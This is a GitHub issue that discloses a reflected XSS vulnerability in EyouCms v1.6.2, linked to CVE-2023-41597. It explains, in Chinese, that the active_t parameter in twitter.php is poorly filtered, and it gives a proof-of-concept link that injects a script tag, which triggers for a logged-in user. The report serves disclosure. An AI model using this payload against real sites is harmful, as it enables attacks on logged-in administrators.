Hebing123 / cve

0 stars 0 forks source link

EyouCms v1.6.2 has a reflective XSS vulnerability #7

Open Hebing123 opened 10 months ago

Hebing123 commented 10 months ago

EyouCms v1.6.2 存在反射型XSS漏洞,系twitter.php文件中active_t参数过滤不严。

image

攻击者构造恶意链接: /admin/twitter.php?active_t=%22%3E%3Cscript%3Ealert(1)%3C/script%3E

登陆后的用户触发xss。

image

Hebing123 commented 10 months ago

This is the vulnerability exploitation reference for CVE-2023-41597